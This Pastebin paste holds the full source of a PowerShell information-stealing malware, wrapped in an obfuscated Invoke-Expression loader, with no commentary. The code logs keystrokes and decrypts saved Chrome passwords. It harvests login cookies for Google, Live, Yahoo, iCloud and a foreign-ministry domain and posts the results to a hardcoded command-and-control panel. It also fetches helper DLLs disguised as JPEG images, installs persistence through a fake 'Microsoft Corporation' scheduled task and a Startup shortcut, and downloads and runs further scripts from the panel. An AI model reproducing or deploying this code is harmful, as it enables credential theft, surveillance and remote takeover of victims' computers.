Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Invoke-ExPrESsiON ( "\" ( New-ObJECt systeM.iO.compresSIon.dEfLATestREAm([Io.mEMorYsTReAM][CoNVert]::FrOMbasE64StriNg('Add-Type -AssemblyName System.Security
- ##################
- $global:panel_url = "http://f6lvapzvn1.linkpc.net/"
- ##################
- $global:SystemDataSQLite = "http://www.9ory.com/uploads/1543938654841.jpeg"
- $global:x64SQLiteInterop = "http://www.9ory.com/uploads/1543938654852.jpeg"
- $global:x86SQLiteInterop = "http://www.9ory.com/uploads/1543938654863.jpeg"
- ##################
- $global:bool = @{
- $true = 'true'
- $false = 'false'
- }
- $global:isprocess64 = @{
- $true = 'x64'
- $false = 'x32'
- }
- $global:iswin64 = @{
- $true = 'Win64'
- $false= 'Win32'
- }
- $global:crlf = "`r`n"
- $global:commandline = (gwmi Win32_Process -Filter ("processid=" + $PID)).CommandLine
- $global:name = 'eSRfqHDaxC'
- $global:install = '%tmp%'
- $global:scriptblock_logger = {
- param($Path)
- if (-not $Path) {exit}
- $signatures = @'
- [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
- public static extern short GetAsyncKeyState(int virtualKeyCode);
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern int GetKeyboardState(byte[] keystate);
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern int MapVirtualKey(uint uCode, int uMapType);
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern int ToUnicodeEx(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags, IntPtr dwhkl);
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern IntPtr GetKeyboardLayout(int idThread);
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern IntPtr GetForegroundWindow();
- [DllImport("user32.dll", CharSet=CharSet.Auto , SetLastError=true)]
- public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out int lpdwProcessId);
- [DllImport("user32.dll",CharSet=CharSet.Auto, SetLastError=true)]
- public static extern int GetWindowText(IntPtr hWnd, System.Text.StringBuilder lpString,int nMaxCount);
- [DllImport("user32.dll", CharSet=CharSet.Auto , SetLastError = true)]
- public static extern int GetWindowTextLength(IntPtr hwnd);
- '@
- if($Script:API -eq $null){
- $Script:API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
- }
- try
- {
- while ($true)
- {
- Start-Sleep -Milliseconds 40
- for ($ascii = 9; $ascii -le 254; $ascii++)
- {
- $state = $Script:API::GetAsyncKeyState($ascii)
- if ($state -eq -32767)
- {
- $null = [console]::CapsLock
- $virtualKey = $API::MapVirtualKey($ascii, 3)
- $kbstate = New-Object Byte[] 256
- $checkkbstate = $API::GetKeyboardState($kbstate)
- $mychar = New-Object -TypeName System.Text.StringBuilder
- $myHwnd = $Script:API::GetForegroundWindow()
- $length = $Script:API::GetWindowTextLength($myHwnd)
- $sb = New-Object -TypeName System.Text.StringBuilder ($length + 1)
- $Script:API::GetWindowText($myHwnd, $sb, $sb.Capacity) | Out-Null;
- $sb = $sb.ToString()
- $myPid = [IntPtr]::Zero
- $myTid = $Script:API::GetWindowThreadProcessId($myHWND,[ref] $myPid)
- $dwhkl = $Script:API::GetKeyboardLayout($myTid)
- $success = $Script:API::ToUnicodeEx($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0,$dwhkl)
- if ($success)
- {
- if ($mychar.ToString()-eq "`r") {
- [System.IO.File]::AppendAllText($Path,"`r`n", [System.Text.Encoding]::Unicode)
- } else {
- if ($sb -eq $old_sb) {
- [System.IO.File]::AppendAllText($Path,$mychar, [System.Text.Encoding]::Unicode)
- } else {
- [System.IO.File]::AppendAllText($Path, "`r`n" + '[' + $sb + '] [' + [System.DateTime]::Now.ToString() + ']' + "`r`n" + $mychar, [System.Text.Encoding]::Unicode)
- $old_sb = $sb
- }
- }
- }
- }
- }
- }
- }
- finally {}
- }
- function Set-Key {
- param([string]$string)
- $length = $string.length
- $pad = 32-$length
- if (($length -lt 16) -or ($length -gt 32)) {Throw "String must be between 16 and 32 characters"}
- $encoding = New-Object System.Text.ASCIIEncoding
- $bytes = $encoding.GetBytes($string + "0" * $pad)
- return $bytes
- }
- $secret = Set-Key "never find this key"
- function Set-EncryptedData {
- param($key,[string]$plainText)
- $securestring = new-object System.Security.SecureString
- $chars = $plainText.toCharArray()
- foreach ($char in $chars) {$secureString.AppendChar($char)}
- $encryptedData = ConvertFrom-SecureString -SecureString $secureString -Key $key
- return $encryptedData
- }
- function Uid {
- $hwid = (Get-WMIObject -Class Win32_BIOS).SerialNumber + '_' + $env:UserName + '_' + $env:ComputerName
- return $hwid;
- }
- function CookiesTo-MYJson ([System.Collections.ArrayList] $ArrayList)
- {
- $i = 0
- $ArrayJson = '[' + $global:crlf
- Foreach ($Array in $ArrayList) {
- $i++
- $ArrayJson += '{' + $global:crlf
- $ArrayJson += '"domain": "' + $Array.domain +'",' + $global:crlf
- $ArrayJson += '"expirationDate": ' + $Array.expirationDate +',' + $global:crlf
- $ArrayJson += '"hostOnly": ' + $global:bool[$Array.hostOnly -eq $true]+',' + $global:crlf
- $ArrayJson += '"httpOnly": ' + $global:bool[$Array.httpOnly -eq $true]+',' + $global:crlf
- $ArrayJson += '"name": "' + $Array.name +'",' + $global:crlf
- $ArrayJson += '"path": "' + $Array.path +'",' + $global:crlf
- $ArrayJson += '"sameSite": "' + $Array.sameSite +'",' + $global:crlf
- $ArrayJson += '"secure": ' + $global:bool[$Array.secure -eq $true]+',' + $global:crlf
- $ArrayJson += '"session": ' +$global:bool[ $Array.session -eq $true]+',' + $global:crlf
- $ArrayJson += '"storeId": "' + $Array.storeId +'",' + $global:crlf
- $ArrayJson += '"value": "' + $Array.value +'",' + $global:crlf
- $ArrayJson += '"id": ' + $Array.id +'' + $global:crlf
- $ArrayJson += '}'
- if ($i -lt $ArrayList.Count) {
- $ArrayJson += ','
- }
- $ArrayJson += $global:crlf
- }
- $ArrayJson += ']'
- return $ArrayJson
- }
- function PasswordsTo-MYJson ([System.Collections.ArrayList] $ArrayList)
- {
- $i = 0
- $ArrayJson = '[' + $global:crlf
- Foreach ($Array in $ArrayList) {
- $i++
- $ArrayJson += '{' + $global:crlf
- $ArrayJson += '"website": "' + $Array.website +'",' + $global:crlf
- $ArrayJson += '"username": "' + $Array.username +'",' + $global:crlf
- $ArrayJson += '"password": "' + $Array.password +'",' + $global:crlf
- $ArrayJson += '"id": ' + $Array.id +'' + $global:crlf
- $ArrayJson += '}'
- if ($i -lt $ArrayList.Count) {
- $ArrayJson += ','
- }
- $ArrayJson += $global:crlf
- }
- $ArrayJson += ']'
- return $ArrayJson
- }
- ### PUBLIC FUNCTION #######
- function unProtecte ($data)
- {
- $decrypt_val = [System.Security.Cryptography.ProtectedData]::Unprotect($data, $null, [Security.Cryptography.DataProtectionScope]::Localmachine)
- $data_val = [System.Text.Encoding]::Default.GetString($decrypt_val)
- Return $data_val
- }
- function ChromeDB
- {
- Return "$($env:LOCALAPPDATA)\Google\Chrome\User Data\Default"
- }
- function FirefoxDB
- {
- $profilePath = "$($env:APPDATA)\Mozilla\Firefox\Profiles\*.default"
- $defaultProfile = $(Get-ChildItem $profilePath).FullName
- Return $defaultProfile
- }
- function OperaDB
- {
- Return "$($env:APPDATA)\Opera Software\Opera Stable"
- }
- function Add-SQLite {
- switch ( [intptr]::Size ) {
- 4 { $binarch = 'x86' }
- 8 { $binarch = 'x64' }
- }
- try {
- $SQLiteCLASS = New-Object -TypeName System.Data.SQLite.SQLiteConnection
- } catch {
- }
- if ($SQLiteCLASS -eq $null) {
- if (![System.IO.File]::Exists("$env:tmp\lib_$binarch\SQLite.Interop.dll") -or ![System.IO.File]::Exists("$env:tmp\lib_$binarch\System.Data.SQLite.dll"))
- {
- $SQLiteWEB = new-object System.Net.WebClient
- try {
- New-Item -ItemType Directory -Force -Path "$env:tmp\lib_$binarch\"
- Switch ($binarch) {
- 'x86' {
- $SQLiteWEB.DownloadFile($global:x86SQLiteInterop,"$env:tmp\lib_$binarch\SQLite.Interop.dll")
- $SQLiteWEB.DownloadFile($global:SystemDataSQLite,"$env:tmp\lib_$binarch\System.Data.SQLite.dll")
- }
- 'x64' {
- $SQLiteWEB.DownloadFile($global:x64SQLiteInterop,"$env:tmp\lib_$binarch\SQLite.Interop.dll")
- $SQLiteWEB.DownloadFile($global:SystemDataSQLite,"$env:tmp\lib_$binarch\System.Data.SQLite.dll")
- }
- }
- } finally {
- $SQLiteWEB.Dispose()
- }
- }
- if ([System.IO.File]::Exists("$env:tmp\lib_$binarch\SQLite.Interop.dll") -and [System.IO.File]::Exists("$env:tmp\lib_$binarch\System.Data.SQLite.dll"))
- {
- Add-Type -Path "$env:tmp\lib_$binarch\System.Data.SQLite.dll"
- return $true
- } else {
- return $false
- }
- } else {
- $SQLiteCLASS.Close()
- return $true
- }
- }
- function urlPOST($link,$data)
- {
- try {
- $webrequest = [System.Net.WebRequest]::Create($link)
- $encodeddata = Set-EncryptedData -key $secret -plainText $data
- $uid = Uid
- $encodedcontent = [System.Text.Encoding]::UTF8.GetBytes("uid=$uid&data=$encodeddata")
- $webrequest.Method = 'POST'
- $webrequest.ContentType = "application/x-www-form-urlencoded"
- $webrequest.UserAgent = $("Mozilla/5.0 ({0}; {1}; {2}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36" -f [Environment]::OSVersion.ToString().Replace("Microsoft Windows ", "Win"),
- $global:iswin64[[Environment]::Is64BitOperatingSystem -eq $true],
- $global:isprocess64[[Environment]::Is64BitProcess -eq $true])
- if($encodedcontent.length -gt 0) {
- $webrequest.ContentLength = $encodedcontent.length
- $requestStream = $webrequest.GetRequestStream()
- $requestStream.Write($encodedcontent, 0, $encodedcontent.length)
- $requestStream.Flush()
- $requestStream.Close()
- }
- [System.Net.WebResponse] $resp = $webrequest.GetResponse();
- if($resp -ne $null)
- {
- return $true
- }
- else
- {
- return $false
- }
- }catch {
- return $false
- }
- }
- ###########################
- function OperaSESSION ($SQLiteDB,$search,$condition) {
- try {
- if(![System.IO.File]::Exists($SQLiteDB)) {
- return $null
- }
- $cookies_array = New-Object System.Collections.Generic.List[System.Object]
- $conn = New-Object -TypeName System.Data.SQLite.SQLiteConnection
- $command = $conn.CreateCommand()
- try {
- $conn.ConnectionString = "Data Source=$SQLiteDB"
- $conn.Open()
- $command.CommandText = "SELECT COUNT(*) AS Count FROM 'cookies' WHERE host_key LIKE $search AND name LIKE $condition"
- $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
- $dataset = New-Object System.Data.DataSet
- [void]$adapter.Fill($dataset)
- if ($dataset.Tables.Count -eq 0 -or $dataset.Tables[0].rows[0].Count -eq 0) {
- return $null
- }
- $command.CommandText = "SELECT * FROM 'cookies' WHERE host_key LIKE $search"
- $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
- $dataset = New-Object System.Data.DataSet
- [void]$adapter.Fill($dataset)
- if ($dataset.Tables.Count -eq 0) {
- return $null
- }
- $i = 0
- foreach ($row in $dataset.Tables[0])
- {
- $i++
- $cookies = @{}
- $cookies.domain = $row.host_key
- $cookies.expirationDate = $row.expires_utc
- $cookies.hostOnly = $false
- $cookies.httpOnly = ($row.httponly -eq 1)
- $cookies.name = $row.name
- $cookies.path = $row.path
- $cookies.sameSite = 'no_restriction'
- $cookies.secure = ($row.secure -eq 1)
- $cookies.session = ($row.has_expires -eq 0)
- $cookies.storeId = '0'
- try {
- $value = unProtecte($row.encrypted_value)
- }catch {
- $value = ''
- }
- $cookies.value = $value
- $cookies.id = $i
- $cookies_array.Add($cookies)
- }
- }
- finally {
- $command.Dispose()
- $conn.Close()
- }
- if ($cookies_array.Count -gt 0) {
- return CookiesTo-MYJson $cookies_array
- } else {
- return $null
- }
- } catch {
- return $null
- }
- }
- function FirefoxSESSION ($SQLiteDB,$search,$condition) {
- try {
- if(![System.IO.File]::Exists($SQLiteDB)) {
- return $null
- }
- $cookies_array = New-Object System.Collections.Generic.List[System.Object]
- $conn = New-Object -TypeName System.Data.SQLite.SQLiteConnection
- $command = $conn.CreateCommand()
- try {
- $conn.ConnectionString = "Data Source=$SQLiteDB"
- $conn.Open()
- $command.CommandText = "SELECT COUNT(*) AS Count FROM 'moz_cookies' WHERE host LIKE $search AND name LIKE $condition"
- $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
- $dataset = New-Object System.Data.DataSet
- [void]$adapter.Fill($dataset)
- if ($dataset.Tables.Count -eq 0 -or $dataset.Tables[0].rows[0].Count -eq 0) {
- return $null
- }
- $command.CommandText = "SELECT * FROM 'moz_cookies' WHERE host LIKE $search"
- $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
- $dataset = New-Object System.Data.DataSet
- [void]$adapter.Fill($dataset)
- if ($dataset.Tables.Count -eq 0) {
- return $null
- }
- $i = 0
- foreach ($row in $dataset.Tables[0])
- {
- $i++
- $cookies = @{}
- $cookies.domain = $row.host
- $cookies.expirationDate = $row.expiry
- $cookies.hostOnly = $false
- $cookies.httpOnly = ($row.isHttpOnly -eq 1)
- $cookies.name = $row.name
- $cookies.path = $row.path
- $cookies.sameSite = 'no_restriction'
- $cookies.secure = ($row.IsSecure -eq 1)
- $cookies.session = $false
- $cookies.storeId = '0'
- $cookies.value = $row.value
- $cookies.id = $i
- $cookies_array.Add($cookies)
- }
- }
- finally {
- $command.Dispose()
- $conn.Close()
- }
- if ($cookies_array.Count -gt 0) {
- return CookiesTo-MYJson $cookies_array
- } else {
- return $null
- }
- } catch {
- return $null
- }
- }
- function ChromeSESSION ($SQLiteDB,$search,$condition) {
- try {
- if(![System.IO.File]::Exists($SQLiteDB)) {
- return $null
- }
- $cookies_array = New-Object System.Collections.Generic.List[System.Object]
- $conn = New-Object -TypeName System.Data.SQLite.SQLiteConnection
- $command = $conn.CreateCommand()
- try {
- $conn.ConnectionString = "Data Source=$SQLiteDB"
- $conn.Open()
- $command.CommandText = "SELECT COUNT(*) AS Count FROM 'cookies' WHERE host_key LIKE $search AND name LIKE $condition"
- $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
- $dataset = New-Object System.Data.DataSet
- [void]$adapter.Fill($dataset)
- if ($dataset.Tables.Count -eq 0 -or $dataset.Tables[0].rows[0].Count -eq 0) {
- return $null
- }
- $command.CommandText = "SELECT * FROM 'cookies' WHERE host_key LIKE $search"
- $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
- $dataset = New-Object System.Data.DataSet
- [void]$adapter.Fill($dataset)
- if ($dataset.Tables.Count -eq 0) {
- return $null
- }
- $i = 0
- foreach ($row in $dataset.Tables[0])
- {
- $i++
- $cookies = @{}
- $cookies.domain = $row.host_key
- $cookies.expirationDate = $row.expires_utc
- $cookies.hostOnly = $false
- $cookies.httpOnly = ($row.httponly -eq 1)
- $cookies.name = $row.name
- $cookies.path = $row.path
- $cookies.sameSite = 'no_restriction'
- $cookies.secure = ($row.secure -eq 1)
- $cookies.session = ($row.has_expires -eq 0)
- $cookies.storeId = '0'
- try {
- $value = unProtecte($row.encrypted_value)
- }catch {
- $value = ''
- }
- $cookies.value = $value
- $cookies.id = $i
- $cookies_array.Add($cookies)
- }
- }
- finally {
- $command.Dispose()
- $conn.Close()
- }
- if ($cookies_array.Count -gt 0) {
- return CookiesTo-MYJson $cookies_array
- } else {
- return $null
- }
- } catch {
- return $null
- }
- }
- function ChromePASS ($SQLiteDB) {
- try {
- if(![System.IO.File]::Exists($SQLiteDB)) {
- return $null
- } else {
- $TimeStamp = get-date -f yyyyMMddhhmm
- $SQLiteDB_Destination = "$env:temp\" + $TimeStamp
- Copy-Item -Path $SQLiteDB -Destination $SQLiteDB_Destination -Force
- }
- $passwords_array = New-Object System.Collections.Generic.List[System.Object]
- $conn = New-Object -TypeName System.Data.SQLite.SQLiteConnection
- $command = $conn.CreateCommand()
- try {
- $conn.ConnectionString = "Data Source=$SQLiteDB_Destination"
- $conn.Open()
- $command.CommandText = "SELECT COUNT(*) AS Count FROM 'logins'"
- $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
- $dataset = New-Object System.Data.DataSet
- [void]$adapter.Fill($dataset)
- if ($dataset.Tables.Count -eq 0 -or $dataset.Tables[0].rows[0].Count -eq 0) {
- return $null
- }
- $command.CommandText = "SELECT origin_url, username_value ,password_value FROM 'logins'"
- $adapter = New-Object -TypeName System.Data.SQLite.SQLiteDataAdapter $command
- $dataset = New-Object System.Data.DataSet
- [void]$adapter.Fill($dataset)
- if ($dataset.Tables.Count -eq 0) {
- return $null
- }
- $i = 0
- foreach ($row in $dataset.Tables[0])
- {
- $i++
- $passwords = @{}
- $passwords.website = $row.origin_url
- $passwords.username = $row.username_value
- try {
- $value = unProtecte($row.password_value)
- }catch {
- $value = ''
- }
- $passwords.password = $value
- $passwords.id = $i
- $passwords_array.Add($passwords)
- }
- }
- finally {
- $command.Dispose()
- $conn.Close()
- Remove-Item $SQLiteDB_Destination
- }
- if ($passwords_array.Count -gt 0) {
- return PasswordsTo-MYJson $passwords_array
- } else {
- return $null
- }
- } catch {
- return $null
- }
- }
- function BrowsersLOGINS {
- try {
- $ChromeDB = ChromeDB
- $ChromePASS = ''
- $ChromePASS = ChromePASS "$ChromeDB\Login Data"
- if ($ChromePASS) {
- # $ChromeSESSION | Set-Content "$env:temp\c_logins.text"
- while ((urlPOST "$global:panel_url/api/chrome/submit" $ChromePASS) -eq $false) {
- Start-Sleep -s 60
- }
- }
- } catch {}
- }
- function Shortcut ($sourceCMD,$destinationPATH,$isPARAM = $false)
- {
- ### BEGIN Shortcut
- $wshshell = New-Object -comObject WScript.Shell
- $shortcut = $wshshell.CreateShortcut($destinationPATH)
- try {
- $actionparams = $sourceCMD.Split(' ',2)
- if ($isPARAM -And $actionparams -is [array]) {
- $shortcut.TargetPath = $actionparams[0]
- if ($actionparams.Length -eq 2) {
- $shortcut.Arguments = $actionparams[1]
- }
- } else {
- $shortcut.TargetPath = $sourceCMD
- }
- $shortcut.IconLocation = "%SystemRoot%\System32\shell32.dll, 3"
- $shortcut.WindowStyle = "7"
- $shortcut.Save()
- } catch {
- }
- }
- function Taskscheduler ($sourceCMD,$isPARAM = $false) {
- ### BEGIN Taskscheduler
- try {
- $service = New-Object -ComObject Schedule.service
- $service.Connect()
- $task = $service.NewTask($null)
- $task.RegistrationInfo.Author = "Microsoft Corporation"
- $task.RegistrationInfo.Description = ""
- $task.Settings.Enabled = $true
- $task.Settings.AllowDemandStart = $true
- $task.Principal.RunLevel = 0
- $trigger = $task.Triggers.Create(2)
- $trigger.StartBoundary = [datetime]::Now.AddMinutes(5).ToString("yyyy-MM-dd'T'HH:mm:ss")
- $trigger.DaysInterval = 1
- $trigger.Enabled = $true
- $trigger.Repetition.StopAtDurationEnd = $false
- $trigger.Repetition.Interval = "PT59M"
- $action = $task.Actions.Create($null)
- $actionparams = $sourceCMD.Split(' ',2)
- if ($isPARAM -And $actionparams -is [array]) {
- $action.Path = $actionparams[0]
- if ($actionparams.Length -eq 2) {
- $action.Arguments = $actionparams[1]
- }
- } else {
- $action.Path = $sourceCMD
- }
- $service.GetFolder("\").RegisterTaskDefinition($name,$task, 6,$null,$null, 0, $null) | Out-Null
- } catch {}
- }
- function Startup {
- $env_var = $global:commandline
- $i = 0
- $param = ""
- while ($env_var.Length -gt 0) {
- if ($env_var.Length -gt 1024) {
- $env_element = $env_var.Substring(0,1024)
- } else {
- $env_element = $env_var.Substring(0,$env_var.Length)
- }
- [Environment]::SetEnvironmentVariable($global:name + '_' + $i,$env_element , 'User')
- $param = $param + "%" + $global:name + '_' + $i + "%"
- $i++
- if ($env_var.Length -gt 1024) {
- $env_var = $env_var.Remove(0,1024)
- } else {
- $env_var = $env_var.Remove(0,$env_var.Length)
- }
- }
- Taskscheduler ('Cmd.exe /c START "" /min ' + $param) $True
- $startup_folder = [System.Environment]::ExpandEnvironmentVariables("%appdata%") + "\Microsoft\Windows\Start Menu\Programs\Startup\"
- Shortcut ('Cmd.exe /c START "" /min ' + $param) ($startup_folder + "\" + $global:name + '.lnk') $True
- }
- function BrowsersPS () {
- $client = New-Object System.Net.WebClient
- try {
- $data = $client.DownloadString("$global:panel_url/api/pscript")
- if ($data -ne '') {
- $scriptBlock = ([scriptblock]::Create($data))
- Start-Job -ScriptBlock $scriptBlock
- # Invoke-Command -ScriptBlock $scriptBlock
- }
- } catch {}
- }
- function BrowsersLOGGER () {
- $install_dir = [System.Environment]::ExpandEnvironmentVariables($global:install)
- if (!(Test-Path $install_dir)) {
- $install_dir = $env:TEMP
- }
- try {
- $data = [System.IO.File]::ReadAllText($install_dir + '\' + $global:name + '.log')
- if ($data -ne $null) {
- while ((urlPOST "$global:panel_url/api/logger/submit" $data) -eq $false) {
- Start-Sleep -s 60
- }
- Remove-Item ($install_dir + '\' + $global:name + '.log')
- }
- } catch {}
- }
- function InitLOGGER() {
- $install_dir = [System.Environment]::ExpandEnvironmentVariables($global:install)
- if (!(Test-Path $install_dir)) {
- $install_dir = $env:TEMP
- }
- Start-Job -ScriptBlock $global:scriptblock_logger -ArgumentList ($install_dir + '\' + $global:name + '.log') | Out-Null
- }
- function BrowsersCOOKIES ($website,$cname) {
- $ChromeDB = ChromeDB
- $ChromeSESSION = ''
- $ChromeSESSION = ChromeSESSION "$chromeDB\Cookies" $website $cname
- if ($ChromeSESSION) {
- while ((urlPOST "$global:panel_url/api/chrome/submit" $ChromeSESSION) -eq $false) {
- Start-Sleep -s 60
- }
- }
- $firefoxDB = firefoxDB
- foreach ($DB in $firefoxDB) {
- $FirefoxSESSION = ''
- $FirefoxSESSION = FirefoxSESSION "$DB\cookies.sqlite" $website $cname
- if ($FirefoxSESSION) {
- while ((urlPOST "$global:panel_url/api/firefox/submit" $FirefoxSESSION) -eq $false) {
- Start-Sleep -s 60
- }
- }
- }
- $OperaDB = OperaDB
- $OperaSESSION = ''
- $OperaSESSION = OperaSESSION "$OperaDB\Cookies" $website $cname
- if ($OperaSESSION) {
- while ((urlPOST "$global:panel_url/api/opera/submit" $OperaSESSION) -eq $false) {
- Start-Sleep -s 60
- }
- }
- }
- $outMutex = ""
- $Mutex = New-Object -TypeName system.threading.mutex($true, "Global\$global:name", [ref] $outMutex)
- if (!$outMutex) {exit}
- while ((Add-SQLite) -eq $false) {
- Start-Sleep -s 60
- }
- InitLOGGER
- while ($true) {
- BrowsersLOGINS
- BrowsersCOOKIES "'%.google.%'" "'SSID'"
- BrowsersCOOKIES "'%.live.%'" "'MSPAuth'"
- BrowsersCOOKIES "'%.yahoo.%'" "'T'"
- BrowsersCOOKIES "'%.mofa.gov.%'" "'cadataKey'"
- BrowsersCOOKIES "'%.icloud.%'" "'X-APPLE-WEBAUTH-TOKEN'"
- BrowsersLOGGER
- Startup
- BrowsersPS
- Start-Sleep -s 900
- }' )"\" + [STRing][ChAr]44 + "\" [SYsteM.io.compresSion.COMpressIOnmODE]::dEComPrEss ) | FOReACh-OBjEcT {New-ObJECt iO.STREAMrEAdeR( `$_"\" + [STRing][ChAr]44 + "\" [SYstEm.TEXt.EncodiNG]::AScii ) }| FoREacH-objeCt{`$_.rEADtOENd( ) } ) | . ( `$PshOmE[21]+`$pSHOmE[34]+'x')"\" )
Add Comment
Please, Sign In to add comment